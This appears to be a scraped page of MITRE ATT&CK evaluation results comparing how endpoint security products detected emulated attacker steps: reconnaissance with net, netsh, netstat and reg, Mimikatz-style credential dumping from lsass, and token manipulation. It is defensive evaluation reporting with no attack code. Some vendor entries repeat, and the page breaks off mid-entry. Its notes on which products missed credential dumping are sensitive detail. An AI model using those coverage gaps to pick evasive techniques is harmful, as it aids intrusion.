The capability showed cmd.exe executing net.exe with command-line arguments and enriched the command with the condition Net Group Reconnaissance Command. The enrichment was tainted by the parent "Powershell Execution Policy ByPass command ran" alert. At least one condition was added to the capability's detection after the start of the evaluation, so this detection is identified as a configuration change. [1] [2] [3]
McAfee
Enrichment
The capability enriched net.exe with the correct Tactic (Discovery) and Technique (Remote System Discovery) and a suspicious indicator that the net utility obtained information about domain computers and controllers. [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4] [5] [6]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence of cmd.exe executing net.exe with command-line arguments (tainted by the suspicious process injection alert associated with rundll32.exe). [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched the execution of net.exe as the execution of an enumeration command. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched the execution of net.exe as the execution of an enumeration command using net or net1. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched cmd.exe executing net with a related ATT&CK Technique (System Network Connections Discovery). [1] [2] [3] [4] [5] [6] [7] [8]
RSA
Telemetry
Telemetry showed cmd.exe running net.exe with command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by activity seen during the privilege escalation step because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Telemetry
Telemetry within the process tree showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched net.exe with a related ATT&CK technique (Account Discovery). [1] [2] [3] [4] [5] [6]
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because net group was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry
Telemetry within the enrichment showed net.exe with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability showed net.exe executing with command-line arguments and enriched the command with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
The OverWatch team identified net group as suspicious with a General Behavior alert. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Cybereason
General Behavior (Tainted)
A General Behavior alert was generated for net.exe executing as part of a suspicious execution chain related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Remote System Discovery). The alert was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry
Telemetry showed the process creation of net group with command-line arguments. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
Enrichment (Delayed)
The capability enriched the net command with a related ATT&CK Technique (T1069 - Permission Groups Discovery) and the correct Tactic (Discovery). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net group as one of the reconnaissance commands performed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1069 - Permission Groups Discovery) and the correct Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8]
F-Secure
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched net.exe indicating that it was run with commands commonly used for reconnaissance. [1] [2] [3] [4] [5] [6]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed cmd.exe executing net.exe with command-line arguments and enriched the command with the condition Net Group Reconnaissance Command. The enrichment was tainted by the parent "Powershell Execution Policy ByPass command ran" alert. The condition contributing to Enrichment was added to the capability's detection after the start of the evaluation, so this detection is identified as a configuration change. See Configuration page for details. [1] [2] [3]
McAfee
Enrichment
The capability enriched net.exe with the correct Tactic (Discovery) and Technique (Remote System Discovery) and a suspicious indicator that the net utility obtained information about domain computers and controllers. [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4] [5] [6]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence of cmd.exe executing net.exe with command-line arguments (tainted by the suspicious process injection alert associated with rundll32.exe). [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched the execution of net.exe as the execution of an enumeration command using net or net1. [1] [2] [3] [4] [5] [6] [7] [8]
RSA
Telemetry
Telemetry showed cmd.exe running net.exe with command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by activity seen during the privilege escalation step because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Enrichment
The capability enriched netsh.exe with a related ATT&CK technique (T1063 - Security Software Discovery) and a tag for Potential Windows Firewall Rule Recon. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry
Telemetry within the process tree showed cmd.exe executing netsh.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because netsh was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry within the OverWatch alert showed netsh executing with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating the execution of netsh by cmd.exe was suspicious. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment (Tainted)
The capability enriched netsh.exe executing with the correct ATT&CK Tactic (Discovery) and a related Technique (Security Software Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry
Telemetry showed the process creation of netsh with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that netsh was a reconnaissance command used to obtain network configuration and the configuration profile of the Windows Firewall. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Enrichment
The capability enriched netsh.exe with an alert for Netsh Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1063 - Security Software Discovery) and the correct Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
F-Secure
Telemetry
Telemetry showed cmd.exe executing netsh.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
GoSecure
Telemetry (Tainted)
Telemetry showed cmd.exe executing netsh.exe with command-line arguments. The telemetry was tainted by the parent "Powershell Execution Policy ByPass command ran" alert. [1] [2] [3] [4] [5]
McAfee
Enrichment
The capability enriched netsh.exe with the correct Tactic (Discovery) and Technique (System Network Configuration Discovery) and a suspicious indicator that the netsh utility manipulated firewall rules. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed cmd.exe executing netsh.exe with command-line arguments. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence of cmd.exe executing netsh.exe with command-line arguments (tainted by the suspicious process injection alert associated with rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Palo Alto Networks
Telemetry
Telemetry showed cmd.exe executing netsh with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Enrichment
The capability enriched netsh.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
Telemetry
Telemetry showed cmd.exe running netsh.exe with command-line arguments. [1] [2] [3] [4] [5]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing netsh.exe with command-line arguments. The telemetry was tainted by activity seen during the privilege escalation step because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Carbon Black
Enrichment
The capability enriched netstat.exe with the correct ATT&CK technique (System Network Connections Discovery). [1] [2] [3] [4] [5] [6] [7]
Telemetry
Telemetry within the process tree showed cmd.exe executing netstat.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7]
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because netstat was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7]
Telemetry
Telemetry within the OverWatch alert showed cmd.exe executing netstat with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7]
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating cmd.exe executing netstat with command-line arguments was suspicious. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7]
Cybereason
Telemetry
Telemetry showed cmd.exe executing netstat with command-line arguments. [1] [2] [3] [4] [5] [6]
Enrichment (Tainted)
The capability enriched netstat.exe executing as Reconnaissance and mapped to the correct ATT&CK Technique (System Network Connections Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6]
Endgame
Telemetry
Telemetry showed the process creation of netstat with command-line arguments. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment (Delayed)
The capability enriched the netstat command with the correct ATT&CK Technique (T1049 - System Network Connections Discovery) and Tactic (Discovery). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that netstat was a reconnaissance command used to enumerate active and listening network ports. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched netstat.exe with an alert for Netstat Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1049 - System Network Connections Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
F-Secure
Enrichment
The capability enriched netstat.exe with a tag identifying the command as enumeration. [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed cmd.exe executing netstat.exe with command-line arguments. The telemetry was tainted by the parent "Powershell Execution Policy ByPass command ran" alert. [1] [2] [3]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing netstat.exe with command-line arguments. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched netstat.exe with the correct Tactic (Discovery) and Technique (System Network Connections Discovery) and a suspicious indicator that network statistics and TCP/IP connections were gathered. [1] [2] [3] [4] [5] [6]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence of cmd.exe executing netstat.exe with command-line arguments (tainted by the suspicious process injection alert associated with rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Palo Alto Networks
Telemetry
Telemetry showed cmd.exe executing netsh with command-line arguments. [1] [2] [3] [4] [5]
Enrichment
The capability enriched netstat.exe executing with the correct ATT&CK Technique (System Network Connections Discovery). [1] [2] [3] [4] [5]
RSA
Telemetry
Telemetry showed cmd.exe running netstat.exe with command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing netstat.exe with command-line arguments. The telemetry was tainted by activity seen during the privilege escalation step because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Specific Behavior
A Specific Behavior alert was generated showing the correct ATT&CK Technique (Credential Dumping). [1] [2] [3]
Telemetry
Telemetry showed an open handle to a thread into lsass.exe, which is indicative of process injection for credential dumping. [1] [2] [3]
CrowdStrike
Telemetry
Telemetry showing the lsass handle open and DLL loading would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2] [3]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for Credential Dumping, which indicated "a DLL was detected as being reflectively loaded in the callstack." The alert was mapped to the correct ATT&CK Technique (Credential Dumping) and Tactic (Credential Access). The process tree view showed the alert as tainted by a parent detection. [1] [2] [3]
General Behavior (Delayed, Tainted)
A General Behavior alert was generated by the OverWatch team indicating the Credential Dumping activity was suspicious. The process tree view showed the alert as tainted by a parent detection. OverWatch is the managed threat hunting service. [1] [2] [3]
Cybereason
Specific Behavior
A Specific Behavior alert was generated for svchost.exe loading Mimikatz and accessing lsass (an audited system resource). The alert was also tagged with the correct ATT&CK Tactic (Credential Access) and related Technique (Process Injection). [1] [2] [3] [4]
Endgame
Specific Behavior
A Specific Behavior alert was generated for the correct ATT&CK Technique (Credential Dumping). [1] [2]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
None
No detection capability demonstrated for this procedure. [1]
GoSecure
None
No detection capability demonstrated for this procedure, though a DDNA Scan alerted for svchost.exe and displayed details related to Process Injection. According to the vendor, DDNA scans trigger due to machine learning scanning in-memory code and identifying that the code is malicious. DDNA output, which is delayed, shows the process capabilities (known as "traits"), which may give an analyst clues on what the process does. [1] [2] [3] [4]
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
Enrichment (Tainted)
The capability enriched data showing a svchost.exe process opening lsass.exe with a description that it was accessing credentials (tainted by parent process injection event that occurred from svchost.exe). Exploit Guard audited the process open and credential extraction event. Vendor stated the Exploit Guard audit events demonstrate that execution would have been prevented if Attack Surface Reduction (ASR) was enabled in blocking mode. Vendor stated that Credential Guard can also mitigate this attack if enabled. [1] [2] [3] [4] [5] [6]
Specific Behavior (Delayed)
A Specific Behavior alert was generated on credential memory access. [1] [2] [3] [4] [5] [6]
Palo Alto Networks
Specific Behavior
A Specific Behavior alert was generated for a suspicious handle being opened to lsass.exe to dump passwords. The alert was tagged with the correct ATT&CK Technique (Credential Dumping). Vendor stated the capability would have prevented this behavior. [1] [2] [3]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure. Vendor states that the capability would normally block credential dumping activity like this, but the mitigation capability was disabled due to the evaluation parameters.
Carbon Black
Telemetry
Telemetry showed an open handle to a thread into lsass.exe, which is indicative of process injection. [1] [2] [3] [4] [5] [6] [7] [8]
CrowdStrike
Enrichment
The capability enriched several event types with descriptions, including a remote process opening a handle to lsass and a DLL being reflectively loaded (ReflectiveDllOpenLsass), as well as an lsass process being accessed (ProcessHollowingDetected). [1] [2] [3] [4] [5]
Cybereason
Specific Behavior
A Specific Behavior alert was generated for svchost.exe reflectively loading a malicious executable, identified as Mimikatz, then accessing lsass. The alert was also tagged with the correct ATT&CK Technique (Process Injection) and Tactics (Defense Evasion, Privilege Escalation). The powerkatz.dll was also seen loaded as floating executable code. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Telemetry
Telemetry showed privileged accesses (PROCESS_VM_READ and PROCESS_QUERY_LIMITED_INFORMATION) into lsass.exe. [1] [2] [3] [4] [5]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2]
F-Secure
None
No detection capability demonstrated for this procedure. [1] [2]
GoSecure
General Behavior
A General Behavior alert was generated when a DDNA Scan alerted for svchost.exe. DDNA scan results showed that svchost.exe "appeared to inject code into another process." According to the vendor, DDNA scans trigger due to machine learning scanning in-memory code and identifying that the code is malicious. DDNA output, which is delayed, shows the process capabilities (known as "traits"), which may give an analyst clues on what the process does. [1] [2] [3] [4] [5] [6] [7] [8]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3]
Microsoft
Specific Behavior (Delayed)
A Specific Behavior alert was generated for process injection into lsass.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed svchost.exe accessing lsass.exe and dumping credentials (tainted by the parent alert on sensitive credential memory read for the first credential dump). Exploit Guard audited the process open and credential extraction events. Vendor stated the Exploit Guard audit events demonstrate that execution would have been prevented if Attack Surface Reduction (ASR) was enabled in blocking mode. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Palo Alto Networks
Specific Behavior
A Specific Behavior alert was generated for a suspicious handle being opened to lsass.exe. The alert was tagged with a related ATT&CK Technique (Credential Dumping). Vendor stated the capability would have prevented this behavior. [1] [2] [3] [4]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3]
Carbon Black
Telemetry
Telemetry showed an open handle to a thread into lsass.exe, which is indicative of process injection for credential dumping. [1] [2] [3]
CrowdStrike
Specific Behavior (Tainted)
A Specific Behavior alert was generated for Credential Dumping, which indicated "a DLL was detected as being reflectively loaded in the callstack." The alert was mapped to the correct ATT&CK Technique (Credential Dumping) and Tactic (Credential Access). The process tree view showed the alert as tainted by a parent detection. [1] [2] [3]
Telemetry
Telemetry for the lsass remote thread and DLL loading would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2] [3]
General Behavior (Delayed, Tainted)
OverWatch also generated a General Behavior alert indicating the Credential Dumping activity was suspicious. The process tree view showed the alert as tainted by a previous detection. OverWatch is the managed threat hunting service. [1] [2] [3]
Specific Behavior (Tainted)
A second Specific Behavior alert was generated for Credential Dumping, which indicated that "a remote thread in LSASS accessed credential registry keys." The alert was mapped to the correct ATT&CK Technique (Credential Dumping) and Tactic (Credential Access). The process tree view showed the alert as tainted by a parent detection. [1] [2] [3]
Cybereason
Telemetry (Tainted)
Telemetry showed svchost.exe injecting into lsass.exe. The telemetry was tainted by the parent "injected (svchost.exe > lsass.exe)" alert. The hashdumpx64.dll was also seen loaded as floating executable code. [1] [2] [3] [4]
Endgame
Specific Behavior
A Specific Behavior alert was generated for the correct ATT&CK Technique (Credential Dumping). [1] [2]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Enrichment
The capability enriched svchost.exe injecting a thread into lsass.exe with a tag identifying credential dumping. [1]
GoSecure
Telemetry (Tainted)
Telemetry showed a thread create within lsass.exe from svchost.exe, which could be indicative of credential dumping. The telemetry was tainted by the parent "Powershell process created" and "Policy Remote Process Compromise" alerts. [1] [2] [3] [4]
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
Enrichment (Tainted)
The capability enriched data showing a svchost.exe process opening lsass.exe with a description that it was accessing credentials (tainted by parent process injection event that occurred from svchost.exe). Exploit Guard audited the process open and credential extraction event. Vendor stated the Exploit Guard audit events demonstrate that execution would have been prevented if Attack Surface Reduction (ASR) was enabled in blocking mode. Vendor stated that Credential Guard can also mitigate this attack if enabled. [1] [2] [3] [4] [5] [6]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed a code injection into lsass.exe. The telemetry was tainted by a parent process injection alert on cmd.exe. [1] [2] [3]
Specific Behavior
A Specific Behavior alert was generated for svchost dumping credentials via the Registry. The alert was tagged with the correct ATT&CK Technique (Credential Dumping). [1] [2] [3]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure. Vendor states that the capability would normally block credential dumping activity like this, but the mitigation capability was disabled due to the evaluation parameters.
Carbon Black
Specific Behavior
A Specific Behavior alert was generated showing the correct ATT&CK Technique (Credential Dumping). [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed a new thread and open handle into lsass.exe, which is indicative of process injection for credential dumping. [1] [2] [3] [4] [5] [6] [7] [8]
CrowdStrike
Enrichment
The capability enriched several event types with descriptions, including for a remote process opening a handle to lsass and a DLL being reflectively loaded (ReflectiveDllOpenLsass), malicious process hollowing (ProcessHollowingDetected), and a remote process injecting code into lsass (LsassInjectedCode). [1] [2] [3] [4] [5]
Cybereason
Specific Behavior
A Specific Behavior alert was generated for svchost.exe injection into lsass.exe. The alert was mapped to the correct ATT&CK Tactics (Defense Evasion, Privilege Escalation) and Technique (Process Injection). The hashdumpx64.dll was also seen loaded as floating executable code. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Specific Behavior
A Specific Behavior alert was generated for the correct ATT&CK Technique (Process Injection). [1] [2] [3] [4] [5]
Telemetry (Tainted)
Telemetry showed multiple privileged accesses (including PROCESS_CREATE_THREAD) into lsass, indicative of Process Injection (tainted by the Process Injection alert). [1] [2] [3] [4] [5]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2]
F-Secure
Enrichment
The capability enriched svchost.exe injecting a thread into lsass.exe with a tag identifying thread injection. [1] [2]
GoSecure
General Behavior
A General Behavior alert was generated when a DDNA Scan alerted for svchost.exe. The DDNA scan results showed that svchost.exe "appeared to inject code into another process." According to the vendor, DDNA scans trigger due to machine learning scanning in-memory code and identifying that the code is malicious. DDNA output, which is delayed, shows the process capabilities (known as "traits"), which may give an analyst clues on what the process does. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for process hijacking based on a thread create within lsass.exe from svchost.exe (tainted by the parent "Powershell process created" and "Policy Remote Process Compromise" alerts). The vendor noted Privilege Escalation is one of ten "Capabilities" that are part of the taxonomy. [1] [2] [3] [4] [5] [6] [7] [8]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3]
Microsoft
Specific Behavior (Delayed)
A Specific Behavior alert was generated for process injection into lsass.exe. The alert was rolled up under the prior lsass.exe process injection alert and the last activity seen field was updated. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed svchost.exe accessing lsass.exe and dumping credentials (tainted by the parent alert on sensitive credential memory read for the first credential dump). Exploit Guard audited the process open and credential extraction events. Vendor stated the Exploit Guard audit events demonstrate that execution would have been prevented if Attack Surface Reduction (ASR) was enabled in blocking mode. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed a code injection into lsass.exe. The telemetry was tainted by a parent process injection alert on cmd.exe. [1] [2] [3] [4]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe injecting into svchost.exe (not counted for detection) then invoking a remote thread into lsass.exe. Powershell.exe was listed as the source of the remote thread into lsass.exe instead of svchost.exe because the alert on powershell.exe came before other events and therefore had increased precedence. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3]
Carbon Black
Telemetry
Telemetry showed a change in user execution context from Debbie to George between parent and child processes, which is indicative of token manipulation. [1] [2] [3] [4]
CrowdStrike
Telemetry
Telemetry showed the compromised process (21898821890) running as Debbie, then children from this process spawning first as Debbie and later as George. This could indicate theft of George's token within the context of the process. [1]
Cybereason
Telemetry (Tainted)
Telemetry showed cmd.exe associated with both users Debbie and George, indicating user context change via token manipulation. The telemetry was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious. [1] [2] [3]
Endgame
Specific Behavior
A Specific Behavior alert was generated for Privilege Escalation based on rundll32.exe, running as Debbie, spawning the process cmd.exe as George, which indicated a possible stolen token. The alert was mapped to the correct ATT&CK Technique (T1134 - Access Token Manipulation) and Tactics (Privilege Escalation, Defense Evasion). [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed the change of user between the parent and child processes rundll32.exe and cmd.exe (tainted by the Privilege Escalation alert). [1] [2] [3] [4]
FireEye
Telemetry
Telemetry showed a process (net.exe) executed during Step 4 as user Debbie and a subsequent process (reg.exe) executed during Step 6 as user George, indicating a change in user context from a stolen token. [1] [2] [3] [4]
F-Secure
Telemetry
Telemetry showed a cmd.exe associated with user Debbie spawn a cmd.exe associated with user George, indicating user context change via token manipulation. [1] [2] [3]
GoSecure
None
No detection capability demonstrated for this procedure. [1] [2]
McAfee
Telemetry
Telemetry showed a change in user execution context from Debbie to George between processes, which is indicative of token manipulation. [1] [2] [3]
Microsoft
Telemetry (Tainted)
Telemetry showed svchost.exe as a high integrity process running as SYSTEM and a subsequent cmd.exe process running as user George (tainted by the parent alert on suspicious process injection into lsass.exe). Svchost.exe was executed with the seclogon command-line argument, indicating token manipulation. [1] [2] [3] [4] [5]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed a cmd.exe associated with user Debbie spawn a cmd.exe associated with user George, indicating user context change via token manipulation. The telemetry was tainted by a parent process injection alert on cmd.exe. [1] [2] [3]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure.
Carbon Black
Enrichment
The capability enriched reg.exe with the correct ATT&CK Technique (T1012 - Query Registry). [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed cmd.exe executing reg.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
CrowdStrike
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating the reg query command was suspicious. The alert was tainted by the parent cmd.exe process. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by the parent cmd.exe process. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Cybereason
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5]
Endgame
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by a parent Process Injection alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified reg.exe as a reconnaissance command to enumerate a Registry key on the host Conficker to determine the configuration of its Windows Terminal Server service. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched reg.exe with an alert for Reg Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1012 - Query Registry) and Tactic (Discovery). An alert was also generated for a File Write To Named Pipe (Weak Signal) for reg.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
Enrichment
The capability enriched reg.exe identifying that a sensitive Registry key was accessed which could be used for recon. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry showed cmd.exe executing reg with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg.exe with command-line arguments. Telemetry also showed that two PIPEs were created as a result of reg.exe execution. The telemetry was tainted by the parent "Powershell process created" alert. [1] [2] [3] [4] [5]
McAfee
General Behavior (Delayed)
A General Behavior alert was generated indicating that reg.exe command-line arguments contain signs of malicious usage such as encoded content or interacting with Registry keys. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Enrichment
The capability enriched reg.exe with the correct ATT&CK Tactic (Discovery) and Technique (Query Registry) and a suspicious indicator that the Registry was queried via execution of the reg.exe utility. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg.exe with command-line arguments. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Microsoft
Telemetry (Tainted)
